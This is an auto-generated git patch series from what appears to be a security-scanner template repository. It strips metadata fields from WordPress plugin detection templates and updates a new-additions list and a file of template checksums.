tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 8486072eea803f08b3758f5284f2db057dd1fc79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:04:04 +0000 Subject: [PATCH 0244/1090] Auto Generated New Template Addition List [Sat Sep 9 17:04:04 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6f50780c04..b0cae2302d 100644 --- a/.new-additions +++ b/.new-additions @@ -46,4 +46,5 @@ http/vulnerabilities/other/kingdee-erp-rce.yaml http/vulnerabilities/other/landray-oa-datajson-rce.yaml http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml +ssl/c2/mythic-c2-ssl.yaml workflows/kev-workflow.yaml From 85069c6510fabcd42ce3a92f4313173e999487a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:04:18 +0000 Subject: [PATCH 0245/1090] Auto Generated Templates Checksum [Sat Sep 9 17:04:18 UTC 2023] :robot: --- templates-checksum.txt | 407 +++++++++++++++++++++-------------------- 1 file changed, 204 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index abaffe1b4d..762e301b9f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -422,7 +422,7 @@ helpers/wordpress/plugins/facebook-for-woocommerce.txt:98f2be81dca85d834586d9f28 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c -helpers/wordpress/plugins/fluentform.txt:b1b357cd3744e960487781819b970f440f4c7ed9 +helpers/wordpress/plugins/fluentform.txt:f895a9e27c38f0528f64c2fa5b6072dceb0e4e27 helpers/wordpress/plugins/font-awesome.txt:4cb6b226aa8498265c8ea84adcf05e5e168e17c1 helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/formidable.txt:f6f8ec8cee0642425740179c78f2bf7d0a6572f1 @@ -485,7 +485,7 @@ helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:01bb70d2c31d6761b11228cfd235f5be71cefeef -helpers/wordpress/plugins/pixelyoursite.txt:d8e23ca5790b46b3d6b48f23efe069ee480120e3 +helpers/wordpress/plugins/pixelyoursite.txt:b7152d408f074f2e070ff05017700f04ee6bf58d helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe @@ -5810,218 +5810,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 